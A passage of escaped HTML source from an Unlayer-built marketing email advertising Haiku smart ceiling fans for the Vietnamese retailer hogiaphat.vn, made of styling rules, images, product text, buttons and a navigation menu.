#u_content_text_deprecated_14 .v-text-align { text-align: center !important; } #u_content_button_12 .v-text-align { text-align: center !important; } #u_content_text_deprecated_15 .v-text-align { text-align: center !important; } #u_content_text_deprecated_16 .v-text-align { text-align: center !important; } #u_content_text_deprecated_17 .v-text-align { text-align: center !important; } #u_content_button_13 .v-text-align { text-align: center !important; } #u_content_text_deprecated_18 .v-text-align { text-align: center !important; } #u_content_text_deprecated_19 .v-text-align { text-align: center !important; } #u_content_text_deprecated_20 .v-text-align { text-align: center !important; } #u_content_button_14 .v-text-align { text-align: center !important; } #u_content_button_5 .v-text-align { text-align: center !important; } #u_content_text_15 .v-text-align { text-align: center !important; } #u_content_text_16 .v-text-align { text-align: center !important; } #u_content_button_9 .v-text-align { text-align: center !important; } #u_content_text_27 .v-text-align { text-align: center !important; } #u_content_text_28 .v-text-align { text-align: center !important; } #u_content_button_7 .v-text-align { text-align: center !important; } #u_content_text_35 .v-text-align { text-align: center !important; } #u_content_text_36 .v-text-align { text-align: center !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Rubik:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f5f5f5;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f5f5f5;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #f5f5f5;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765403006-LOGO.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 0px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765991818-Haiku-I.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 300px;\\\" width=\\\"300\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f1c40f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1ea1i Hoa K\\u1ef3.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 25.2px;\\\"><strong>QU\\u1ea0T TR\\u1ea6N TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_5\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 40px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi ch\\u1ebf \\u0111\\u1ed9 Haiku Fan-Eco mang l\\u1ea1i hi\\u1ec7u qu\\u1ea3 h\\u00e0ng \\u0111\\u1ea7u th\\u1ebf gi\\u1edbi nh\\u1edd s\\u1ef1 ti\\u1ec7n l\\u1ee3i c\\u1ee7a thi\\u1ebft b\\u1ecb di \\u0111\\u1ed9ng c\\u1ee7a b\\u1ea1n. Fan Eco mang \\u0111\\u1ebfn kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng ch\\u01b0a t\\u1eebng c\\u00f3 v\\u1edbi lu\\u1ed3ng kh\\u00f4ng kh\\u00ed l\\u00e0m m\\u00e1t h\\u00e0i h\\u00f2a v\\u00e0 ho\\u00e0n h\\u1ea3o.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:33px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#db1908\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #db1908; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:8px 25px 8px 24px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768028416-haiku-bg_optimized.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_menu_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"menu\\\" style=\\\"text-align:center\\\">\\r\\n<!--[if (mso)|(IE)]><table role=\\\"presentation\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" align=\\\"center\\\"><tr><![endif]-->\\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/\\\" target=\\\"_self\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      HOME\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px;\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/giam-gia\\\" target=\\\"_blank\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      \\u0110ANG SALE OFF\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px;\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-go\\\" target=\\\"_blank\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px;\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cong-nghiep\\\" target=\\\"_blank\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      QU\\u1ea0T TR\\u1ea6N HVLS\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n<!--[if (mso)|(IE)]><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #111416;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #111416;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"192\\\" style=\\\"width: 192px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-32\\\" style=\\\"max-width: 320px;min-width: 192px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_4\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>S\\u1eec D\\u1ee4NG N\\u0102NG L\\u01af\\u1ee2NG HI\\u1ec6U QU\\u1ea2<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/du-an-tieu-bieu-haiku.pdf\\\" style=\\\"height:37px; v-text-anchor:middle; width:164px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center 